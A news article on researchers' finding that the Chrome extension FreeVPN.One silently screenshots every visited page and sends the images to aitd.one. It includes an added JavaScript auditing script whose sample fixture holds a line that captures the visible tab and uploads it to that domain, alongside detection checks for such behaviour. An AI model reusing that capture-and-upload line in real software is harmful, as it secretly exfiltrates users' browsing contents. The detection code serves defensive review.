Researchers discovered that the Chrome extension FreeVPN.One secretly spies on users.
FreeVPN.One, a popular VPN extension for Google Chrome with over 100,000 installations, has been secretly spying on users, researchers at security company Koi Security have found. Despite having a verified badge (which gives users a sense of trust) and prominent placement in the Chrome Web Store, the extension takes screenshots of visited websites and sends them to external servers without users’ knowledge.
Invisible Screenshots
The extension installs a script that is automatically injected into every website. Shortly after a page loads, the script triggers an internal call to take a screenshot of the active tab. This image is then sent to an external server via the domain aitd.one, along with information such as the URL and a unique user ID.
Users never receive any warning or visual signal that this is happening. Moreover, the screenshots are collected not only when users activate the ‘Scan with AI Threat Detection’ feature but much earlier, on every website visit. This means sensitive information such as banking details, private photos, and company documents may have been captured.
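As an added example (not code from the extension or from the researchers' report), the sketch below statically audits an unpacked extension for the combination described above: a content script matched to every site, a permission that allows tab capture, and a capture call in the source, plus references to the domain named in this article. It assumes the capture goes through Chrome's `chrome.tabs.captureVisibleTab` API, which the article does not name; `auditExtension`, the sample manifest, the source strings and the URL path are all constructed for illustration.

```javascript
// Added example: static audit of an unpacked extension (not the extension's own code).
const BROAD = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// manifest: parsed manifest.json; sources: {fileName: text}; domains: indicators to search for
function auditExtension(manifest, sources, domains) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];

  // Content script injected into every website
  const everySite = (manifest.content_scripts || [])
    .some((cs) => (cs.matches || []).some((m) => BROAD.has(m)));
  if (everySite) findings.push("content-script:all-sites");

  // chrome.tabs.captureVisibleTab requires "<all_urls>" or "activeTab"
  const canCapture = perms.includes("<all_urls>") || perms.includes("activeTab");
  if (canCapture) findings.push("permission:can-capture-tab");

  let callsCapture = false;
  for (const [file, text] of Object.entries(sources)) {
    if (/\bcaptureVisibleTab\s*\(/.test(text)) {
      callsCapture = true;
      findings.push(`capture-call:${file}`);
    }
    for (const d of domains) {
      // Match the domain and its subdomains, not look-alikes such as "xaitd.one"
      const re = new RegExp(`(?<![a-z0-9-])${escapeRe(d)}(?![a-z0-9-])`, "i");
      if (re.test(text)) findings.push(`domain:${d}:${file}`);
    }
  }
  // The combination matters: each signal alone is common in legitimate extensions
  const suspicious = everySite && canCapture && callsCapture;
  return { suspicious, findings };
}

// Constructed sample input, not FreeVPN.One's real manifest or source
const sampleManifest = {
  manifest_version: 3,
  permissions: ["tabs", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};
const sampleSources = {
  "content.js": 'chrome.runtime.sendMessage({ type: "capture" });',
  "background.js": 'chrome.tabs.captureVisibleTab(null, { format: "png" }, (img) =>' +
    ' fetch("https://aitd.one/placeholder", { method: "POST", body: img }));',
};
console.log(auditExtension(sampleManifest, sampleSources, ["aitd.one"]));
```

String matching on source files is defeated by obfuscation, so the manifest findings are the more durable signal when reviewing an installed extension.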
Control Mechanisms
FreeVPN.One was active in the Chrome Web Store for years without its malicious behavior being noticed. The spying presumably began in version 3.1.3, which was rolled out on July 17, 2025. That’s when the screenshot mechanism was activated and data exfiltration to aitd.one began. A few weeks later, in version 3.1.4, encryption was added and traffic was redirected to a new subdomain to further complicate detection.
Google claims to perform automated and manual checks on extensions in the Chrome Web Store. In this case, those checks proved insufficient. Despite the significant change in the extension’s behavior, FreeVPN.One remained verified and highly visible to new users.
